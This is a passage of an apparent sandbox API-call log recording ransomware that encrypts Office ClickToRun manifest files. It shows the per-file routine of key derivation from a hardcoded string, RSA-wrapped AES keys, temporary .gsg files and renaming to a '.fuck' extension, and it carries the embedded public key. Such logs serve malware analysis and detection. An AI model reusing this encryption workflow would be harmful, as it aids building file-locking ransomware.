users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.353] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.353] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.354] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.354] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.354] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.354] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.355] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.355] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.355] GetLastError () returned 0x5 [0239.355] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml")) returned 0x20 [0239.355] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.356] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.356] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.357] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.357] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab618) returned 1 [0239.362] CryptCreateHash (in: hProv=0x28ab618, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.362] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.362] CryptHashData (hHash=0x2893fb0, pbData=0x2856de0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.362] CryptDeriveKey (in: hProv=0x28ab618, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.362] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.362] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.362] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab7b0) returned 1 [0239.362] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab7b0, dwCertEncodingType=0x1, pInfo=0x2897ac0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897af0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897af8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28942b0) returned 1 [0239.362] CryptEncrypt (in: hKey=0x28942b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.363] CryptEncrypt (in: hKey=0x28942b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab838*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ab838*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.363] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ab838, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.363] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.363] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.363] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.363] CloseHandle (hObject=0xffffffff) returned 1 [0239.363] CloseHandle (hObject=0xffffffff) returned 1 [0239.363] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.364] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.364] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml.gsg")) returned 0 [0239.365] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpointmui.msi.16.en-us.xml.fuck")) returned 0 [0239.365] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.365] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.365] CryptReleaseContext (hProv=0x28ab618, dwFlags=0x0) returned 1 [0239.365] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.365] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.365] GetLastError () returned 0x5 [0239.365] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml")) returned 0x20 [0239.366] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.366] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.367] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.367] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.367] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.371] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.371] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.371] CryptHashData (hHash=0x2893af0, pbData=0x2857088, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.371] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.371] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.371] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.371] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab590) returned 1 [0239.371] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab590, dwCertEncodingType=0x1, pInfo=0x2898140*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898170*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898178*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894470) returned 1 [0239.371] CryptEncrypt (in: hKey=0x2894470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.372] CryptEncrypt (in: hKey=0x2894470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab618*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ab618*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.372] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ab618, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.372] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.372] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.372] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.372] CloseHandle (hObject=0xffffffff) returned 1 [0239.372] CloseHandle (hObject=0xffffffff) returned 1 [0239.372] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.373] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.373] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.374] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Project.Project.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.project.project.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.374] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.374] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.374] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.374] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.374] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.374] GetLastError () returned 0x5 [0239.374] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml")) returned 0x20 [0239.375] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.375] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.376] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.376] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.376] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab8c0) returned 1 [0239.380] CryptCreateHash (in: hProv=0x28ab8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.380] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.380] CryptHashData (hHash=0x2893fb0, pbData=0x2857178, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.380] CryptDeriveKey (in: hProv=0x28ab8c0, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.380] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.380] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.380] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac0b8) returned 1 [0239.381] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac0b8, dwCertEncodingType=0x1, pInfo=0x28979f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897a20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897a28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28944b0) returned 1 [0239.381] CryptEncrypt (in: hKey=0x28944b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.381] CryptEncrypt (in: hKey=0x28944b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28abc78*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28abc78*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.381] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28abc78, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.381] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.381] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.381] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.381] CloseHandle (hObject=0xffffffff) returned 1 [0239.382] CloseHandle (hObject=0xffffffff) returned 1 [0239.382] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.382] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.382] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml.gsg")) returned 0 [0239.383] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.projectmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.projectmui.msi.16.en-us.xml.fuck")) returned 0 [0239.383] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.383] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.383] CryptReleaseContext (hProv=0x28ab8c0, dwFlags=0x0) returned 1 [0239.384] FindNextFileA (in: 